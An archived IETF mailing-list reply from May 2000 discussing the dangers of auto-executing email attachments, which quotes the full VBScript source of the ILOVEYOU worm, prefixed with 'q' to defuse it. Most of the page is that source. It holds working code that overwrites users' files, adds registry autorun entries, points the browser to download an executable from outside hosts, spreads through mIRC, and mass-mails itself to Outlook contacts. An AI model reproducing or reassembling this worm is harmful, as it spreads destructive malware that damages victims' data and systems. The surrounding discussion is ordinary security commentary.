ietf
[Top] [All Lists]

RE: Security insanity

2000-05-04 13:03:47
I agree with you - anything that is happening automatically and without 
the chance for the user to say "yes" or "no thank you" is calling for this
kind of attacks. It should be part of ActiveX or any other technology.
Nothing should autoexecute. Unfortunately a lot of e-commerce and software
companies are guilty of peppering the Internet with "auto-updates",(see AOL)
"checks" (see Windowsupdate.com), cookies, (Need I say!) etc.. which are all

open invitations for break-in and worse.
A strict standard is very much called for, IMO we must find the fine line
between user-friendly and vulnerable.

Lillian Komlossy                     
Site Manager                         
http://www.dmnews.com           
http://www.imarketingnews.com  
(212) 925-7300 ext. 232 


-----Original Message-----
From: Donald E. Eastlake 3rd [mailto:dee3(_at_)torque(_dot_)pothole(_dot_)com]
Sent: Thursday, May 04, 2000 1:54 PM
To: ietf(_at_)ietf(_dot_)org
Subject: Security insanity



It's not switching to UNIX, its avoiding secuirty insanity like
AcitveX, self-extracting binaries, automatically executing attachemnts
on opening on opening mail, as apparently Outlook does, etc.  A few
seconds thought would tell anyone with a clue what a bad idea these
are.

It is just insane that vast parts of the computing capacity of the world
can be damaged this badly and this trivially.

Donald

PS:  Appended below is the virus in a hopefully non-virulent form.

Donald,

The whole world will not switch over to Unix 
- the average user will always be more confortable with Windows 
unless Unix will at one point offer the same  seamless user-friendliness. 
So it will always be a problem, one which cannot be solved by telling 
others not to use what they've accustomed to - and one which cannot be
ignored.

Lillian Komlossy                     
Site Manager                         
http://www.dmnews.com           
http://www.imarketingnews.com  
(212) 925-7300 ext. 232 

=====================================================================
 Donald E. Eastlake 3rd                      
dee3(_at_)torque(_dot_)pothole(_dot_)com
 140 Forest Avenue                                +1 914-276-2668(h)
 Hudson, MA 01749 USA                             +1 508-261-5434(w)

q MIME-Version: 1.0
q X-Mailer: Internet Mail Service (5.5.2448.0)
q Content-Type: multipart/mixed;
q       boundary="----_=_NextPart_000_01BFB5DE.957A65A0"
q 
q This message is in MIME format. Since your mail reader does not understand
q this format, some or all of this message may not be legible.
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: text/plain
q 
q 
q kindly check the attached LOVELETTER coming from me.
q 
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: application/octet-stream;
q       name="LOVE-LETTER-FOR-YOU.TXT.vbs"
q Content-Transfer-Encoding: quoted-printable
q Content-Disposition: attachment;
q       filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
q 
q rem  barok -loveletter(vbe) <i hate go to school>
q rem                   by: spyder  /  ispyder(_at_)mail(_dot_)com  /  
@GRAMMERSoft
Group  /  =
q Manila,Philippines
q On Error Resume Next
q dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
q eq=3D""
q ctr=3D0
q Set fso =3D CreateObject("Scripting.FileSystemObject")
q set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
q vbscopy=3Dfile.ReadAll
q main()
q sub main()
q On Error Resume Next
q dim wscr,rr
q set wscr=3DCreateObject("WScript.Shell")
q rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
q Scripting Host\Settings\Timeout")
q if (rr>=3D1) then
q wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
q Host\Settings\Timeout",0,"REG_DWORD"
q end if
q Set dirwin =3D fso.GetSpecialFolder(0)
q Set dirsystem =3D fso.GetSpecialFolder(1)
q Set dirtemp =3D fso.GetSpecialFolder(2)
q Set c =3D fso.GetFile(WScript.ScriptFullName)
q c.Copy(dirsystem&"\MSKernel32.vbs")
q c.Copy(dirwin&"\Win32DLL.vbs")
q c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q regruns()
q html()
q spreadtoemail()
q listadriv()
q end sub
q sub regruns()
q On Error Resume Next
q Dim num,downread
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
q el32",dirsystem&"\MSKernel32.vbs"
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
q s\Win32DLL",dirwin&"\Win32DLL.vbs"
q downread=3D""
q downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Download Directory")
q if (downread=3D"") then
q downread=3D"c:\"
q end if
q if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
q Randomize
q num =3D Int((4 * Rnd) + 1)
q if num =3D 1 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
q hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
q elseif num =3D 2 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
q erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
q elseif num =3D 3 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
q QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
q elseif num =3D 4 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
q GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
q -BUGSFIX.exe"
q end if
q end if
q if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
q GSFIX",downread&"\WIN-BUGSFIX.exe"
q regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Main\Start Page","about:blank"
q end if
q end sub
q sub listadriv
q On Error Resume Next
q Dim d,dc,s
q Set dc =3D fso.Drives
q For Each d in dc
q If d.DriveType =3D 2 or d.DriveType=3D3 Then
q folderlist(d.path&"\")
q end if
q Next
q listadriv =3D s
q end sub
q sub infectfiles(folderspec) =20
q On Error Resume Next
q dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
q set f =3D fso.GetFolder(folderspec)
q set fc =3D f.Files
q for each f1 in fc
q ext=3Dfso.GetExtensionName(f1.path)
q ext=3Dlcase(ext)
q s=3Dlcase(f1.name)
q if (ext=3D"vbs") or (ext=3D"vbe") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
q or (ext=3D"sct") or (ext=3D"hta") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q bname=3Dfso.GetBaseName(f1.path)
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(folderspec&"\"&bname&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"jpg") or (ext=3D"jpeg") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(f1.path&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"mp3") or (ext=3D"mp2") then
q set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
q mp3.write vbscopy
q mp3.close
q set att=3Dfso.GetFile(f1.path)
q att.attributes=3Datt.attributes+2
q end if
q if (eq<>folderspec) then
q if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
q (s=3D"script.ini") or (s=3D"mirc.hlp") then
q set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
q scriptini.WriteLine "[script]"
q scriptini.WriteLine ";mIRC Script"
q scriptini.WriteLine ";  Please dont edit this script... mIRC will =
q corrupt, if mIRC will"
q scriptini.WriteLine "     corrupt... WINDOWS will affect and will not =
q run correctly. thanks"
q scriptini.WriteLine ";"
q scriptini.WriteLine ";Khaled Mardam-Bey"
q scriptini.WriteLine ";http://www.mirc.com";
q scriptini.WriteLine ";"
q scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
q scriptini.WriteLine "n1=3D  /if ( $nick =3D=3D $me ) { halt }"
q scriptini.WriteLine "n2=3D  /.dcc send $nick =
q "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
q scriptini.WriteLine "n3=3D}"
q scriptini.close
q eq=3Dfolderspec
q end if
q end if
q next =20
q end sub
q sub folderlist(folderspec) =20
q On Error Resume Next
q dim f,f1,sf
q set f =3D fso.GetFolder(folderspec) =20
q set sf =3D f.SubFolders
q for each f1 in sf
q infectfiles(f1.path)
q folderlist(f1.path)
q next =20
q end sub
q sub regcreate(regkey,regvalue)
q Set regedit =3D CreateObject("WScript.Shell")
q regedit.RegWrite regkey,regvalue
q end sub
q function regget(value)
q Set regedit =3D CreateObject("WScript.Shell")
q regget=3Dregedit.RegRead(value)
q end function
q function fileexist(filespec)
q On Error Resume Next
q dim msg
q if (fso.FileExists(filespec)) Then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q function folderexist(folderspec)
q On Error Resume Next
q dim msg
q if (fso.GetFolderExists(folderspec)) then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q sub spreadtoemail()
q On Error Resume Next
q dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
q set regedit=3DCreateObject("WScript.Shell")
q set out=3DWScript.CreateObject("Outlook.Application")
q set mapi=3Dout.GetNameSpace("MAPI")
q for ctrlists=3D1 to mapi.AddressLists.Count
q set a=3Dmapi.AddressLists(ctrlists)
q x=3D1
q regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
q if (regv=3D"") then
q regv=3D1
q end if
q if (int(a.AddressEntries.Count)>int(regv)) then
q for ctrentries=3D1 to a.AddressEntries.Count
q malead=3Da.AddressEntries(x)
q regad=3D""
q regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
q ad)
q if (regad=3D"") then
q set male=3Dout.CreateItem(0)
q male.Recipients.Add(malead)
q male.Subject =3D "ILOVEYOU"
q male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
q me."
q male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q male.Send
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
q end if
q x=3Dx+1
q next
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q else
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q end if
q next
q Set out=3DNothing
q Set mapi=3DNothing
q end sub
q sub html
q On Error Resume Next
q dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
q dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
q NAME=3D(_at_)-@Generator(_at_)-@ CONTENT=3D(_at_)-@BAROK VBS - 
LOVELETTER(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Author(_at_)-@ CONTENT=3D(_at_)-@spyder ?-? 
ispyder(_at_)mail(_dot_)com ?-? =
q @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Description(_at_)-@ CONTENT=3D(_at_)-@simple but i 
think this is =
q good(_dot_)(_dot_)(_dot_)(_at_)-@>"&vbcrlf& _
q "<?-?HEAD><BODY =
q ONMOUSEOUT=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
q "ONKEYDOWN=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D(_at_)-@fixed(_at_)-@ =
q BGCOLOR=3D(_at_)-@#FF9933(_at_)-@>"&vbcrlf& _
q "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
q read this HTML file<BR>- Please press #-#YES#-# button to Enable =
q ActiveX<?-?p>"&vbcrlf& _
q "<?-?CENTER><MARQUEE LOOP=3D(_at_)-@infinite(_at_)-@ =
q 
BGCOLOR=3D(_at_)-@yellow(_at_)-@>----------z--------------------z----------<?-?MAR=
q QUEE> "&vbcrlf& _
q "<?-?BODY><?-?HTML>"&vbcrlf& _
q "<SCRIPT language=3D(_at_)-@JScript(_at_)-@>"&vbcrlf& _
q "<!--?-??-?"&vbcrlf& _
q "if (window.screen){var wi=3Dscreen.availWidth;var =
q hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
q rlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"&vbcrlf& _
q "<SCRIPT LANGUAGE=3D(_at_)-@VBScript(_at_)-@>"&vbcrlf& _
q "<!--"&vbcrlf& _
q "on error resume next"&vbcrlf& _
q "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
q "aw=3D1"&vbcrlf& _
q "code=3D"
q dta2=3D"set =
q fso=3DCreateObject(@-(_at_)Scripting(_dot_)FileSystemObject@-@)"&vbcrlf& _
q "set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
q "code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
q "code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
q "code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
q "set =
q 
wri=3Dfso.CreateTextFile(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)"&vbcrlf& 
_
q "wri.write code4"&vbcrlf& _
q "wri.close"&vbcrlf& _
q "if (fso.FileExists(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)) 
then"&vbcrlf& _
q "if (err.number=3D424) then"&vbcrlf& _
q "aw=3D0"&vbcrlf& _
q "end if"&vbcrlf& _
q "if (aw=3D1) then"&vbcrlf& _
q "document.write @-(_at_)ERROR: can#-#t initialize ActiveX(_at_)-@"&vbcrlf& _
q "window.close"&vbcrlf& _
q "end if"&vbcrlf& _
q "end if"&vbcrlf& _
q "Set regedit =3D CreateObject(@-(_at_)WScript(_dot_)Shell@-@)"&vbcrlf& _
q "regedit.RegWrite =
q @-(_at_)HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
q 
-^Run^-^MSKernel32(_at_)-@,dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@"&vbcrlf&
 _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"
q dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
q dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
q dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
q dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
q dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
q dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
q dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
q dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
q set fso=3DCreateObject("Scripting.FileSystemObject")
q set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
q lines=3DSplit(c.ReadAll,vbcrlf)
q l1=3Dubound(lines)
q for n=3D0 to ubound(lines)
q lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
q lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
q lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
q if (l1=3Dn) then
q lines(n)=3Dchr(34)+lines(n)+chr(34)
q else
q lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
q end if
q next
q set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
q b.close
q set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
q d.write dt5
q d.write join(lines,vbcrlf)
q d.write vbcrlf
q d.write dt6
q d.close
q end sub
q ------_=_NextPart_000_01BFB5DE.957A65A0--



<Prev in Thread] Current Thread [Next in Thread>
  • Security insanity, Donald E. Eastlake 3rd
    • RE: Security insanity, Lillian Komlossy <=